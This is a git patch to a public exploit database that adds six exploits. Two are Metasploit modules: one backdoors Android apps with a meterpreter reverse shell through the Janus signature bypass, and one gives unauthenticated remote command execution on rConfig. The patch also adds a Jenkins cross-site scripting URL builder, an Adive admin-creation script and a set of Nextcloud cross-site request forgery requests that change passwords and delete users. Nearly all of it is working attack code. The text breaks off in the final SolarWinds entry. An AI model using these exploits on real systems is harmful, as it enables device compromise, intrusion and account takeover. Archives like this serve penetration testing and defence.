From b6ed2c717617bdb785554fc4d1dfa1cb1e9a0c60 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 Nov 2019 05:01:40 +0000 Subject: [PATCH] DB: 2019-11-09 6 changes to exploits/shellcodes SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path Android Janus - APK Signature Bypass (Metasploit) rConfig - install Command Execution (Metasploit) Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting Adive Framework 2.0.7 - Privilege Escalation Nextcloud 17 - Cross-Site Request Forgery --- exploits/android/local/47601.rb | 162 ++++++++++++++++ exploits/java/webapps/47598.py | 44 +++++ exploits/linux/remote/47602.rb | 114 +++++++++++ exploits/php/webapps/47600.py | 82 ++++++++ exploits/php/webapps/47603.txt | 314 +++++++++++++++++++++++++++++++ exploits/windows/local/47599.txt | 36 ++++ files_exploits.csv | 6 + 7 files changed, 758 insertions(+) create mode 100755 exploits/android/local/47601.rb create mode 100755 exploits/java/webapps/47598.py create mode 100755 exploits/linux/remote/47602.rb create mode 100755 exploits/php/webapps/47600.py create mode 100644 exploits/php/webapps/47603.txt create mode 100644 exploits/windows/local/47599.txt diff --git a/exploits/android/local/47601.rb b/exploits/android/local/47601.rb new file mode 100755 index 000000000..603b11c0b --- /dev/null +++ b/exploits/android/local/47601.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'msf/core/payload/apk' + +class MetasploitModule < Msf::Exploit::Local + Rank = ManualRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Android::Priv + include Msf::Payload::Android + + def initialize(info={}) + super( update_info( info, { + 'Name' => "Android Janus APK Signature bypass", + 'Description' => %q{ + This module exploits CVE-2017-13156 in Android to install a payload into another + application. The payload APK will have the same signature and can be installed + as an update, preserving the existing data. + The vulnerability was fixed in the 5th December 2017 security patch, and was + additionally fixed by the APK Signature scheme v2, so only APKs signed with + the v1 scheme are vulnerable. + Payload handler is disabled, and a multi/handler must be started first. + }, + 'Author' => [ + 'GuardSquare', # discovery + 'V-E-O', # proof of concept + 'timwr', # metasploit module + 'h00die', # metasploit module + ], + 'References' => [ + [ 'CVE', '2017-13156' ], + [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ], + [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ], + ], + 'DisclosureDate' => 'Jul 31 2017', + 'SessionTypes' => [ 'meterpreter' ], + 'Platform' => [ 'android' ], + 'Arch' => [ ARCH_DALVIK ], + 'Targets' => [ [ 'Automatic', {} ] ], + 'DefaultOptions' => { + 'PAYLOAD' => 'android/meterpreter/reverse_tcp', + 'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission + 'DisablePayloadHandler' => true, + }, + 'DefaultTarget' => 0, + 'Notes' => { + 'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'], + 'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore + } + })) + register_options([ + OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']), + ]) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + ] + end + + def check + os = cmd_exec("getprop ro.build.version.release") + unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0')) + vprint_error "Android version #{os} is not vulnerable." + return CheckCode::Safe + end + vprint_good "Android version #{os} appears to be vulnerable." + + patch = cmd_exec('getprop ro.build.version.security_patch') + if patch.empty? + print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.' + elsif patch > '2017-12-05' + vprint_error "Android security patch level #{patch} is patched." + return CheckCode::Safe + else + vprint_good "Android security patch level #{patch} is vulnerable" + end + + CheckCode::Appears + end + + def exploit + + def infect(apkfile) + unless apkfile.start_with?("package:") + fail_with Failure::BadConfig, 'Unable to locate app apk' + end + apkfile = apkfile[8..-1] + print_status "Downloading APK: #{apkfile}" + apk_data = read_file(apkfile) + + begin + # Create an apk with the payload injected + apk_backdoor = ::Msf::Payload::Apk.new + apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false) + + # Extract the classes.dex + dex_data = '' + Zip::File.open_buffer(apk_zip) do |zipfile| + dex_data = zipfile.read("classes.dex") + end + dex_size = dex_data.length + + # Fix the original APKs zip file code directory + cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06") + cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0] + apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V") + pos = cd_start_addr + while pos && pos < cd_end_addr + offset = apk_data[pos+42, pos+46].unpack("V")[0] + apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V") + pos = apk_data.index("\x50\x4b\x01\x02", pos+46) + end + + # Prepend the new classes.dex to the apk + out_data = dex_data + apk_data + out_data[32...36] = [ out_data.length ].pack("V") + out_data = fix_dex_header(out_data) + + out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk" + print_status "Uploading APK: #{out_apk}" + write_file(out_apk, out_data) + register_file_for_cleanup(out_apk) + print_status "APK uploaded" + + # Prompt the user to update the APK + session.appapi.app_install(out_apk) + print_status "User should now have a prompt to install an updated version of the app" + true + rescue => e + print_error e.to_s + false + end + end + + unless [CheckCode::Detected, CheckCode::Appears].include? check + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if datastore["PACKAGE"] == 'ALL' + vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)') + apkfiles = [] + all = cmd_exec("pm list packages").split("\n") + c = 1 + all.each do |package| + package = package.split(':')[1] + vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}") + c += 1 + next if ['com.metasploit.stage', # avoid injecting into ourself + ].include? package # This was left on purpose to be expanded as need be for testing + result = infect(cmd_exec("pm path #{package}")) + break if result + end + else + infect(cmd_exec("pm path #{datastore["PACKAGE"]}")) + end + end +end \ No newline at end of file diff --git a/exploits/java/webapps/47598.py b/exploits/java/webapps/47598.py new file mode 100755 index 000000000..8a0cc6815 --- /dev/null +++ b/exploits/java/webapps/47598.py @@ -0,0 +1,44 @@ +# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting +# Date: 2019-11-06 +# Exploit Author: vesche (Austin Jackson) +# Vendor Homepage: https://plugins.jenkins.io/build-metrics +# Version: Jenkins build-metrics plugin 1.3 and below +# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3 +# CVE: CVE-2019-10475 +# Write-up: https://github.com/vesche/CVE-2019-10475 + +#!/usr/bin/env python + +import sys +import argparse + +VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search''' + + +def get_parser(): + parser = argparse.ArgumentParser(description='CVE-2019-10475') + parser.add_argument('-p', '--port', help='port', default=80, type=int) + parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str) + parser.add_argument('-i', '--inject', help='inject', default='', type=str) + return parser + + +def main(): + parser = get_parser() + args = vars(parser.parse_args()) + port = args['port'] + domain = args['domain'] + inject = args['inject'] + if port == 80: + base_url = f'http://{domain}' + elif port == 443: + base_url = f'https://{domain}' + else: + base_url = f'http://{domain}:{port}' + build_url = VULN_URL.format(base_url=base_url, inject=inject) + print(build_url) + return 0 + + +if __name__ == '__main__': + sys.exit(main()) \ No newline at end of file diff --git a/exploits/linux/remote/47602.rb b/exploits/linux/remote/47602.rb new file mode 100755 index 000000000..b2bc9aba4 --- /dev/null +++ b/exploits/linux/remote/47602.rb @@ -0,0 +1,114 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'rConfig install Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated command injection vulnerability + in rConfig versions 3.9.2 and prior. The `install` directory is not + automatically removed after installation, allowing unauthenticated users + to execute arbitrary commands via the `ajaxServerSettingsChk.php` file + as the web server user. + + This module has been tested successfully on rConfig version 3.9.2 on + CentOS 7.7.1908 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mhaskar', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'References' => + [ + ['CVE', '2019-16662'], + ['EDB', '47555'], + ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'], + ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/'] + ], + 'Platform' => %w[unix linux], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Payload' => {'BadChars' => "\x00\x0a\x0d\x26"}, + 'Targets' => + [ + ['Automatic (Unix In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, + 'Type' => :unix_memory + ], + ['Automatic (Linux Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'}, + 'Type' => :linux_dropper + ] + ], + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, + 'DisclosureDate' => '2019-10-28', + 'DefaultTarget' => 0)) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/']) + ]) + end + + def check + res = execute_command('id') + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 404 + vprint_error 'Could not find install directory' + return CheckCode::Safe + end + + cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first + + unless cmd_res + return CheckCode::Safe + end + + vprint_status "Response: #{cmd_res}" + + unless cmd_res.include?('uid=') + return CheckCode::Detected + end + + CheckCode::Vulnerable + end + + def execute_command(cmd, opts = {}) + vprint_status "Executing command: #{cmd}" + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'), + 'vars_get' => {'rootUname' => ";#{cmd} #"} + }, 5) + end + + def exploit + unless [CheckCode::Detected, CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable" + end + + case target['Type'] + when :unix_memory + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager(:linemax => 1_500) + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47600.py b/exploits/php/webapps/47600.py new file mode 100755 index 000000000..3657c0e17 --- /dev/null +++ b/exploits/php/webapps/47600.py @@ -0,0 +1,82 @@ +# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation +# Date: 2019-08-02 +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://www.adive.es/ +# Software Link: https://github.com/ferdinandmartin/adive-php7 +# Version: 2.0.7 +# Tested on: Windows 10 +# CVE : CVE-2019-14347 + +#Exploit + +import requests +import sys + +session = requests.Session() + +http_proxy = "http://127.0.0.1:8080" +https_proxy = "https://127.0.0.1:8080" + +proxyDict = { + "http" : http_proxy, + "https" : https_proxy + } +print('[*****************************************]') +print('[ BYPASSING Adive Framework Version.2.0.5 ]') +print('[*****************************************]''\n') + + + +print('[+]Login with the correct credentials:' '\n') + +user = input('[+]user:') +password = input('[+]password:') +print('\n') + +url = 'http://localhost/adive/admin/login' +values = {'user': user, + 'password': password, + } + +r = session.post(url, data=values, proxies=proxyDict) +cookie = session.cookies.get_dict()['PHPSESSID'] + +print('Your session cookie is:'+ cookie +'\n') + + +host = sys.argv[1] +print('Create the new user:') +userName = input('[+]User:') +userUsername = input('[+]UserName:') +password = input('[+]Password:') +password2 = input('[+]Confirm Password:') +print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor') +permission = input('[+]permission:') + +if (password == password2): +#configure proxy burp + +#hacer el request para la creacion de usuario +data = { +'userName':userName, +'userUsername':userUsername, +'pass':password, +'cpass':password2, +'permission':permission, + +} + +headers= { +'Cookie': 'PHPSESSID='+cookie +} + +request = session.post(host+'/adive/admin/user/add', data=data, +headers=headers, proxies=proxyDict) +print('+--------------------------------------------------+') + +else: +print ('Passwords dont match!!!') + +#PoC +https://imgur.com/dUgLYi6 +https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif \ No newline at end of file diff --git a/exploits/php/webapps/47603.txt b/exploits/php/webapps/47603.txt new file mode 100644 index 000000000..cafb15443 --- /dev/null +++ b/exploits/php/webapps/47603.txt @@ -0,0 +1,314 @@ +# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery +# Date: 08.11.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://nextcloud.com +# Software Link: https://nextcloud.com/install/#instructions-server +# Version: 17 +# CVE: N/A + + +#Nextcloud offers the industry-leading, on-premises content collaboration +platform. +#Our technology combines the convenience and ease of use of consumer-grade +solutions like Dropbox and Google Drive with the security, privacy and +control business #needs. + +################################################################################################################################## + +# CSRF1 +# Create Folder + +MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 + + +################################################################################################################################## + +# CSRF2 +# Delete Folder + +DELETE /remote.php/dav/files/ogoker/test HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 + + +################################################################################################################################## + +# CSRF3 +# Create User + +POST /ocs/v2.php/cloud/users HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json;charset=utf-8 +requesttoken: +qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= +Content-Length: 129 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 + +{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"} + + + +################################################################################################################################## + +# CSRF4 +# Delete User + +DELETE /ocs/v2.php/cloud/users/test HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 + + +################################################################################################################################## + +# CSRF5 +# Disable User + +PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 +Content-Length: 0 + + +################################################################################################################################## + +# CSRF6 +# Enable User + +PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; +nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 +Content-Length: 0 + + +################################################################################################################################## + +# CSRF7 +# Create Group + +POST /ocs/v2.php/cloud/groups HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json;charset=utf-8 +requesttoken: +EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= +Content-Length: 18 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + +{"groupid":"test"} + + +################################################################################################################################## + +# CSRF8 +# Delete Group + +DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + + +################################################################################################################################## + +# CSRF9 +# Change User Full Name + + +PUT /settings/users/ogoker/settings HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/javascript, /; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +requesttoken: +nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 266 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + +{"displayname":"Ozer +Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} + + +################################################################################################################################## + +# CSRF10 +# Change User Email + +PUT /settings/users/ogoker/settings HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: application/json, text/javascript, /; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +requesttoken: +I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 271 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + +{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test +","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} + + +################################################################################################################################## + +# CSRF11 +# Change Language + +PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 21 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + +key=language&value=tr + + +################################################################################################################################## + +# CSRF12 +# Change User Password + +POST /settings/personal/changepassword HTTP/1.1 +Host: 192.168.2.109 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 70 +Connection: close +Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; +oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; +__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; +redirect=1; testing=1 + +oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678 + + +################################################################################################################################## \ No newline at end of file diff --git a/exploits/windows/local/47599.txt b/exploits/windows/local/47599.txt new file mode 100644 index 000000000..519a45f2b --- /dev/null +++ b/exploits/windows/local/47599.txt @@ -0,0 +1,36 @@ +# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path +# Date: 2019-11-08 +# Exploit Author: Carlos A Garcia R +# Vendor Homepage: 